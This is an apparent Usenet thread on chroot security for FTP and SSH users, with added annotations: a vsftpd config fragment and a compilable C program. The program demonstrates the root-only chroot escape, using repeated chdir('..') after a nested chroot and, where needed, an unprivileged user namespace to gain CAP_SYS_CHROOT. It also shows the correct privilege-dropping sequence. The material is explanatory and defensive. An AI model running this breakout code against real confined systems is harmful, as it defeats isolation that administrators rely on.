


How secure is chroot?

Hi,
I'm going to configure chroot on my Linux server (RHL8) in order to limit
users to their home directories. I got a lot of information from some websites,
and some of them warned that chroot can also be broken. So, is it safe to
set up chroot on my Linux server, since I would provide secure FTP services
for some users? I don't want them browsing other directories on the
server.

Thanks,

Keith


0
keithtin (1)
6/30/2003 4:32:42 AM
comp.security.ssh


Keith, if you're going to use FTP, you should be using vsFTPd
http://vsftpd.beasts.org/ which includes chroot functionality with a
simple...
chroot_local_user=YES
...setting. You can also pick & choose which users will be chrooted,
etc. Check it out.

If you're wanting to do chroot at ssh level (hence posting to THIS
newsgroup?) there's been a bit of discussion about this in a recent
posting earlier in this group...
http://groups.google.com/groups?dq=&hl=en&lr=&ie=UTF-8&threadm=20030628171315.6130a5ab.alex.ferguson%40NOSPAMdartmouth.edu&prev=/groups%3Fhl%3Den%26lr%3D%26ie%3DUTF-8%26group%3Dcomp.security.ssh
0
jonsnews (13)
6/30/2003 10:27:36 AM
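For the vsftpd route jon recommends, here is an added vsftpd.conf fragment (not from the thread and not the vsftpd project's own sample file) showing the weak setting next to the chrooted one, together with the exception list that implements the "pick & choose" part. The list file path is an assumption.

```ini
local_enable=YES
write_enable=YES

# Default/weak: chroot_local_user=NO leaves every logged-in local user free
# to cd out of $HOME and browse the whole filesystem (/etc, other homes, ...).
#chroot_local_user=NO

# Corrected: confine every local user to their own home directory ...
chroot_local_user=YES

# ... except the accounts named in this file (assumed path, one username
# per line), which keep full access. Note the inverted meaning: with
# chroot_local_user=YES the list is the set of users NOT chrooted.
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
```

One caveat for anyone doing this on a current vsftpd: from 2.3.5 on it refuses to log a user into a chroot whose root directory is writable by that user ("refusing to run with writable root inside chroot()") unless you set allow_writeable_chroot=YES. The cleaner fix is to keep the home directory root-owned and not writable, and give the user a writable subdirectory for uploads.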
Keith wrote:
> "jon" <jonsnews@hotmail.com> wrote in message
> news:cf91fbf4.0306300227.3ecb971b@posting.google.com...
> 
>>Keith, If you're going to use FTP, you should be using vsFTPd
>>http://vsftpd.beasts.org/ which includes chroot functionality with a
>>simple...
>>chroot_local_user=YES
>>...setting. You can also pick & choose which users will be chrooted,
>>etc. Check it out.
>>
>>If you're wanting to do chroot at ssh level (hence posting to THIS
>>newsgroup?) there's been a bit of discussion about this in a recent
>>posting earlier in this group...
>>
> 
> http://groups.google.com/groups?dq=&hl=en&lr=&ie=UTF-8&threadm=20030628171315.6130a5ab.alex.ferguson%40NOSPAMdartmouth.edu&prev=/groups%3Fhl%3Den%26lr%3D%26ie%3DUTF-8%26group%3Dcomp.security.ssh
> 
> Which method do you think is better (for usability and security): setting up
> chroot over ssh, or just setting up vsftpd? Thanks.
> 
> Keith

If you want to make download/upload trivial for everyone, vsftpd (which 
is an FTP daemon). If you don't want passwords sniffed or want to 
provide public key access and possible remote shell access, chrooted ssh.

0
nkadel2 (101)
7/2/2003 3:52:24 AM
Keith - if your users are going to be copying files to/from the SSH
server from their Windows machines then PuTTY and WinSCP (using key
authentication) are a nice way to go. Look into getting your users to
load their private key into the PuTTY agent - I do this by adding the
agent to their Startup folder & pointing it at their key (e.g. target
path is '"C:\Program Files\PuTTY\pageant.exe" h:\keys\putty.PPK'
...where h: is their home drive).

If you can get chroot working with OpenSSH - even better.

Sounds like you don't need FTP on this occasion. Good luck.
0
jonsnews (13)
7/2/2003 4:02:24 PM
On Wed, 2 Jul 2003 18:03:57 +0800
"Keith" <keithtin@yahoo.com.hk> wrote:

> But you had also mentioned chrooted ssh could be broken, indeed.
[snip]

You've mentioned concerns about chroot a couple of times, so I'm guessing you read somewhere that it is possible to break out of the chroot and see the rest of the filesystem.  Barring a horrible kernel bug, this should be true *only* for the root user.  IIRC, it is possible as root to break out of a chroot by something like this:

mkdir foo
chroot to foo
cd ../../../../../../../../../../..
chroot to .

This works because you chroot yourself to a directory below the current directory.  Since chroot() requires root privileges, a normal user should not be able to break a chroot.  Real chrooted applications need to always chroot(foo); cd(/); setuid(bar) where bar != 0 :)

I wrote up a very short C program which can be used as a user's shell and chroots to their home directory, then execs sh, but I never bothered to actually use it.  It might be of use if you want to chroot OpenSSH users, though there is probably a more polished version out there somewhere. Let me know if you would like me to post it where you can download it.

--Alex
0
7/2/2003 5:53:08 PM
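The four-step escape Alex describes, and the chroot(); chdir("/"); setuid() sequence he says real chrooted applications must use, side by side as an added C example (not code from the thread, and not Alex's shell wrapper). Linux only. The escape needs CAP_SYS_CHROOT, which normally means root; when run as an ordinary user the program first tries to become root inside a fresh user namespace, which assumes the kernel allows unprivileged user namespaces. The jail is a temporary directory under /tmp and the probe file /etc/passwd are assumptions for the demo.

```c
/* Added example: the chroot() escape and the safe chroot()+chdir("/")+setuid()
 * sequence. Needs CAP_SYS_CHROOT (root, or root inside a user namespace). */
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Safe sequence for a service: root the process at `jail`, move the cwd
 * inside the new root, then give up root for good. Returns 0 or -errno and
 * stops at the first failure, so the caller can refuse to serve rather than
 * run half-jailed as root. */
int enter_jail(const char *jail, uid_t uid, gid_t gid)
{
    if (chroot(jail) != 0)          return -errno;
    if (chdir("/") != 0)            return -errno;  /* cwd was outside the new root */
    if (setgroups(0, NULL) != 0)    return -errno;  /* supplementary groups too */
    if (setgid(gid) != 0)           return -errno;
    if (setuid(uid) != 0)           return -errno;
    if (uid != 0 && setuid(0) == 0) return -EPERM;  /* must not be able to come back */
    return 0;
}

/* The escape Alex describes: a root process inside a jail makes a
 * subdirectory and chroots into it WITHOUT chdir, so its cwd is now outside
 * the new root. chdir("..") from there is no longer clamped at the jail and
 * walks up to the real root; chroot(".") then makes that the root again.
 * Returns 0 on success or -errno (EPERM without CAP_SYS_CHROOT). */
int escape_chroot(void)
{
    if (mkdir("esc", 0700) != 0 && errno != EEXIST) return -errno;
    if (chroot("esc") != 0)                          return -errno;
    for (int i = 0; i < 64; i++)                     /* deeper than any real jail */
        if (chdir("..") != 0) return -errno;
    if (chroot(".") != 0)                            return -errno;
    return 0;
}

/* For unprivileged runs: become uid/gid 0 in a new user namespace, which
 * grants CAP_SYS_CHROOT there. Assumes unprivileged user namespaces are
 * enabled; returns 0 or -errno. */
static int root_in_userns(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();
    FILE *f;
    if (unshare(CLONE_NEWUSER) != 0) return -errno;
    if ((f = fopen("/proc/self/setgroups", "w"))) { fputs("deny", f); fclose(f); }
    if (!(f = fopen("/proc/self/uid_map", "w"))) return -errno;
    fprintf(f, "0 %u 1", (unsigned)uid); fclose(f);
    if (!(f = fopen("/proc/self/gid_map", "w"))) return -errno;
    fprintf(f, "0 %u 1", (unsigned)gid); fclose(f);
    return 0;
}

static const char *seen(const char *path) { return access(path, F_OK) == 0 ? "yes" : "no"; }

int main(void)
{
    char jail[] = "/tmp/jail.XXXXXX";   /* assumed location for the demo jail */
    if (geteuid() != 0 && root_in_userns() != 0) {
        perror("need CAP_SYS_CHROOT (root, or root in a user namespace)");
        return 1;
    }
    if (!mkdtemp(jail)) { perror("mkdtemp"); return 1; }

    /* A service that chroots but keeps running as root: jailed ... */
    if (chroot(jail) != 0 || chdir("/") != 0) { perror("chroot"); return 1; }
    printf("inside jail:  /etc/passwd visible? %s\n", seen("/etc/passwd"));

    /* ... only until it runs the four steps above. */
    int r = escape_chroot();
    printf("escape_chroot: %s\n", r ? strerror(-r) : "ok");
    printf("after escape: /etc/passwd visible? %s\n", seen("/etc/passwd"));

    if (r == 0) {                       /* back at the real root: tidy up */
        char esc[64];
        snprintf(esc, sizeof esc, "%s/esc", jail);
        rmdir(esc);
        rmdir(jail);
    }
    return r ? 1 : 0;
}
```

Compile with `gcc -o chroot_demo chroot_demo.c` and run it as root (or as yourself on a kernel with user namespaces enabled): the first line reports that /etc/passwd is hidden by the jail, the last that it is visible again. Run enter_jail() instead and the escape is impossible, because chroot() and chdir("..") past the root both require the privilege the process just dropped. That is exactly why the setuid() step, and its ordering after chdir("/"), matters: a chroot that keeps root is a speed bump, not a boundary.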